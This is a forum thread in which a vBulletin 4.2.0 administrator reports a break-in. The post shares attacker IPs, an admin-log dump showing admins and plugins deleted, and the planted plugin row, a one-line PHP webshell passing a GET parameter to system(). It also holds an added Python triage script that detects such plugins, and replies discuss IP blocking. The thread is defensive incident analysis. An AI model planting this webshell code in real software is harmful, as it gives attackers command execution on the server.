
v4.2.0 hacker details


team74
09-22-2013, 08:52 PM
This script kiddy can't handle his hormones and has gone on a rampage.

https://www.google.co.uk/#q=%22ma3kesi%22

Most of the forums are running 4.2.0 (some patch 3). Several hundred (including mine) are showing that username indexed in google in the past week.

IP addresses found in my adminlog table (you can look them up yourselves; they are from Indonesia/Burma):

203.81.72.83
101.255.62.233
Email (I think it's not real; they didn't need a real email once inside): ma3kesi@mm.com

Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook).

What they did.
From the adminlog (descending, so the first actions are at the bottom):

Column headers: `adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress`

(7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83'),
(7626, 1920, 1379801594, 'user.php', 'find', '', '203.81.72.83'),
(7625, 1920, 1379801583, 'user.php', 'find', '', '203.81.72.83'),
(7624, 1920, 1379801578, 'user.php', 'modify', '', '203.81.72.83'),
(7623, 1920, 1379801565, 'user.php', 'add', '', '203.81.72.83'),
(7622, 1920, 1379801447, 'plugin.php', '', '', '203.81.72.83'),
(7621, 1920, 1379801445, 'plugin.php', 'kill', 'plugin id = 40', '203.81.72.83'),
(7620, 1920, 1379801443, 'plugin.php', 'delete', 'plugin id = 40', '203.81.72.83'),
(7619, 1920, 1379801438, 'plugin.php', '', '', '203.81.72.83'),
(7618, 1920, 1379801436, 'plugin.php', 'kill', 'plugin id = 42', '203.81.72.83'),
(7617, 1920, 1379801434, 'plugin.php', 'delete', 'plugin id = 42', '203.81.72.83'),
(7616, 1920, 1379801428, 'plugin.php', '', '', '203.81.72.83'),
(7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'),
(7614, 1920, 1379801424, 'plugin.php', 'delete', 'plugin id = 41', '203.81.72.83'),
(7613, 1920, 1379801410, 'plugin.php', 'modify', '', '203.81.72.83'),
(7612, 1920, 1379801373, 'options.php', 'options', '', '203.81.72.83'),
(7611, 1920, 1379801371, 'options.php', 'dooptions', '', '203.81.72.83'),
(7610, 1920, 1379801359, 'options.php', 'options', '', '203.81.72.83'),
(7609, 1920, 1379801279, 'options.php', 'options', '', '203.81.72.83'),
(7608, 1920, 1379801226, 'options.php', 'options', '', '203.81.72.83'),
(7607, 1920, 1379801224, 'options.php', 'dooptions', '', '203.81.72.83'),
(7606, 1920, 1379801181, 'options.php', 'options', '', '203.81.72.83'),
(7605, 1920, 1379801180, 'options.php', 'dooptions', '', '203.81.72.83'),
(7604, 1920, 1379801144, 'options.php', 'options', '', '203.81.72.83'),
(7603, 1920, 1379801125, 'options.php', '', '', '203.81.72.83'),
(7602, 1920, 1379801038, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7601, 1920, 1379801023, 'user.php', 'modify', '', '203.81.72.83'),
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7599, 1920, 1379801016, 'user.php', 'remove', 'user id = 1919', '203.81.72.83'),
(7598, 1920, 1379801011, 'user.php', 'edit', 'user id = 1919', '203.81.72.83'),
(7597, 1920, 1379801005, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7596, 1920, 1379800998, 'user.php', 'modify', '', '203.81.72.83'),
(7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'),
(7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'),
(7593, 1920, 1379800978, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7592, 1920, 1379800969, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7591, 1920, 1379800891, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7590, 1920, 1379800870, 'user.php', 'find', '', '203.81.72.83'),
(7589, 1920, 1379800860, 'user.php', 'modify', 'user id = 1', '203.81.72.83'),
(7588, 1920, 1379800858, 'user.php', 'update', 'user id = 1', '203.81.72.83'),
(7587, 1920, 1379800838, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7586, 1920, 1379800807, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7585, 1920, 1379800798, 'user.php', 'prune', '', '203.81.72.83'),
(7584, 1920, 1379800796, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7583, 1920, 1379800786, 'user.php', 'prune', '', '203.81.72.83'),
(7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7581, 1920, 1379800783, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7580, 1920, 1379800781, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7579, 1920, 1379800779, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7578, 1920, 1379800777, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7577, 1920, 1379800775, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7575, 1920, 1379800628, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7574, 1920, 1379800602, 'user.php', 'prune', '', '203.81.72.83'),
(7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'),
(7572, 1920, 1379800556, 'banning.php', 'banuser', '', '203.81.72.83'),
(7571, 1920, 1379800485, 'plugin.php', 'updateactive', '', '203.81.72.83'),
(7570, 1920, 1379800467, 'plugin.php', '', '', '203.81.72.83'),
(7569, 1920, 1379800465, 'plugin.php', 'kill', 'plugin id = 18', '203.81.72.83'),
(7568, 1920, 1379800462, 'plugin.php', 'delete', 'plugin id = 18', '203.81.72.83'),
(7567, 1920, 1379800445, 'plugin.php', '', '', '203.81.72.83'),
(7566, 1920, 1379800443, 'plugin.php', 'kill', 'plugin id = 17', '203.81.72.83'),
(7565, 1920, 1379800441, 'plugin.php', 'delete', 'plugin id = 17', '203.81.72.83'),
(7564, 1920, 1379800421, 'plugin.php', '', '', '203.81.72.83'),
(7563, 1920, 1379800420, 'plugin.php', 'kill', 'plugin id = 51', '203.81.72.83'),
(7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'),
(7561, 1920, 1379800412, 'plugin.php', 'modify', '', '203.81.72.83'),
(7560, 1920, 1379800376, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7559, 1920, 1379800371, 'navigation.php', 'update', 'navid = 0, tabid = 2', '203.81.72.83'),
(7558, 1920, 1379800363, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7557, 1920, 1379800361, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7556, 1920, 1379800359, 'navigation.php', 'default', 'navid = 2, tabid = 0', '203.81.72.83'),
(7555, 1920, 1379800351, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7554, 1920, 1379800349, 'navigation.php', 'update', 'navid = 0, tabid = 1', '203.81.72.83'),
(7553, 1920, 1379800343, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7552, 1920, 1379800341, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7551, 1920, 1379800338, 'navigation.php', 'default', 'navid = 75, tabid = 0', '203.81.72.83'),
(7550, 1920, 1379800283, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7549, 1920, 1379800281, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7548, 1920, 1379800278, 'navigation.php', 'default', 'navid = 1, tabid = 0', '203.81.72.83'),
(7547, 1920, 1379800273, 'navigation.php', 'list', 'navid = 0, tabid = 0', '203.81.72.83'),
(7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'),
(7545, 1920, 1379800170, 'template.php', 'edit', 'style id = 0', '203.81.72.83'),
(7544, 1920, 1379800166, 'template.php', 'modify', '', '203.81.72.83'),
(7543, 1920, 1379800156, 'template.php', 'modify', '', '203.81.72.83'),
(7542, 1920, 1379800151, 'template.php', 'modify', '', '203.81.72.83'),
(7541, 1920, 1379800099, 'plugin.php', '', '', '203.81.72.83'),
(7540, 1920, 1379800091, 'plugin.php', 'update', '', '203.81.72.83'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'),
(7530, 1919, 1379796615, 'plugin.php', '', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233');

They deleted userid 1919, so I can't check it. 1920 is still there and is the new admin after deleting me. You can also see they exploited it with one IP and then carried out the rest of the attack with the other.

They inserted this plugin (it was id=52 for me):

(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5);

And they deleted the default plugins that display the forum.

Initially they did change the main forum.php file too; I think this was through the admincp option, because there is no sign of FTP access. I'm not a server guy; maybe they got in through SSH.

I also have about 550 lines of raw server log data showing what these 2 IPs did. I'm not sure if I should post it or not, though. It seems to start with admincp/zxc.php.
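
The adminlog rows and the plugin row above are what a responder actually has to work with, so here is a small triage script as an added example (not vBulletin's code and not from the post). It parses rows in the dumped `(adminlogid, userid, dateline, script, action, extrainfo, ipaddress)` shape, rebuilds the timeline oldest first, and flags the indicators described in the post: admin userids you did not create, the IPs each of them used (one IP for the break-in and another for the rest), `kill` actions against legitimate admins, plugin/user destruction, and plugin `phpcode` that hands request input to a command or code sink, as the `ajax_complete` plugin does. The adminlog sample is a subset copied from the dump above; the plugin sample is the posted row plus one constructed benign row; the function names and the `known_admins` set are assumptions for the example.

```python
# Added example, not vBulletin code: triage of a dumped adminlog + plugin table.
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timezone
from typing import NamedTuple

# Rows copied from the adminlog dump in the post (a subset; any order is fine).
ADMINLOG_DUMP = r"""
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'),
(7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'),
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'),
(7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83');
"""
# The ajax_complete webshell row from the post, plus one constructed benign row.
PLUGIN_DUMP = r"""
(40, 'Constructed benign plugin', 'forumdisplay_start', 'if ($vbulletin->options[''showthreads'']) { $show[''threads''] = true; }', 'vbulletin', '', 1, 5),
(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5);
"""

# (adminlogid, userid, dateline, script, action, extrainfo, ipaddress); '' is an escaped quote.
ROW_RE = re.compile(r"\(?\s*(\d+),\s*(\d+),\s*(\d+),\s*'([^']*)',\s*'([^']*)',"
                    r"\s*'((?:[^']|'')*)',\s*'([^']*)'\s*\)")
# (pluginid, title, hookname, phpcode, ...): only the first four columns matter here.
PLUGIN_RE = re.compile(r"\((\d+),\s*'((?:[^']|'')*)',\s*'((?:[^']|'')*)',\s*'((?:[^']|'')*)'")
USER_TARGET = re.compile(r"user id = (\d+)")
# A plugin that feeds request input into a code/command sink is a webshell.
SHELL_SINK = re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I)
REQUEST_SRC = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# Admincp actions worth flagging: account/plugin destruction, and code persistence.
DESTRUCTIVE = {("user.php", "kill"), ("user.php", "dodeleteusers"), ("user.php", "dopruneusers"),
               ("plugin.php", "kill"), ("banning.php", "dobanuser")}
PERSISTENCE = {("plugin.php", "doimport"), ("plugin.php", "add"), ("plugin.php", "update"),
               ("template.php", "updatetemplate")}


class Entry(NamedTuple):
    adminlogid: int
    userid: int
    dateline: int
    script: str
    action: str
    extrainfo: str
    ipaddress: str


def iso(dateline: int) -> str:
    return datetime.fromtimestamp(dateline, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def parse_adminlog(dump: str) -> list[Entry]:
    """Parse dumped rows and return them oldest first (the post lists them newest first)."""
    rows = [Entry(int(a), int(u), int(d), s, act, x.replace("''", "'"), ip)
            for a, u, d, s, act, x, ip in ROW_RE.findall(dump)]
    return sorted(rows, key=lambda e: (e.dateline, e.adminlogid))


def triage(entries: list[Entry], known_admins: set[int]) -> dict:
    """Admin userids you did not create, the IPs each used, legitimate admins
    deleted, and the destructive/persistence actions, in timeline order."""
    first_seen: dict[int, str] = {}
    ips_by_user: dict[int, set[str]] = defaultdict(set)
    destructive, persistence, admins_killed = [], [], []
    for e in entries:
        first_seen.setdefault(e.userid, iso(e.dateline))
        ips_by_user[e.userid].add(e.ipaddress)
        key = (e.script, e.action)
        if key in DESTRUCTIVE:
            destructive.append(e)
        if key in PERSISTENCE:
            persistence.append(e)
        target = USER_TARGET.search(e.extrainfo)
        if key == ("user.php", "kill") and target and int(target.group(1)) in known_admins:
            admins_killed.append(int(target.group(1)))
    unknown = sorted(u for u in first_seen if u not in known_admins)
    attacker_ips = sorted(set().union(*(ips_by_user[u] for u in unknown)))
    return {"unknown_admins": unknown, "first_seen": first_seen,
            "ips_by_user": {u: sorted(ips) for u, ips in ips_by_user.items()},
            "attacker_ips": attacker_ips,
            "multi_ip_pivot": len(attacker_ips) > 1,  # break in from one IP, operate from another
            "admins_killed": admins_killed, "destructive": destructive, "persistence": persistence}


def scan_plugins(dump: str) -> list[tuple[int, str, str]]:
    """(pluginid, title, hookname) of every plugin whose phpcode looks like a webshell."""
    return [(int(pid), title, hook) for pid, title, hook, code in PLUGIN_RE.findall(dump)
            if SHELL_SINK.search(code) and REQUEST_SRC.search(code)]


if __name__ == "__main__":
    found = triage(parse_adminlog(ADMINLOG_DUMP), known_admins={1})
    print("unknown admins", found["unknown_admins"], "from", found["attacker_ips"])
    print("legitimate admins killed", found["admins_killed"], "webshell plugins", scan_plugins(PLUGIN_DUMP))
```

Run it on the dumped adminlog and plugin tables with `known_admins` set to the userids you actually created. Two caveats that follow from the post itself: the adminlog only records admincp activity, so the initial entry (the access-log lines starting at admincp/zxc.php) has to come from the web server logs, and an attacker who holds admincp can also delete the rows that incriminate them, as they deleted userid 1919 here, so treat the adminlog as one source alongside file timestamps and access logs, not the whole picture.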

pityocamptes
09-24-2013, 02:16 AM
Anyway, just to post the IPs by themselves?

Max Taxable
09-24-2013, 02:33 AM
"Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook)."

IP blocking is a near-useless tool anymore, since IPs and even user agent strings are so easy to spoof. Great and informative post though, otherwise.

alirex
09-25-2013, 05:42 PM
That's why I mostly keep my admincp locked with .htaccess and allow only my own IP. At least I have been safe for the last 8 months; I only got hacked once last year, and I recovered from that.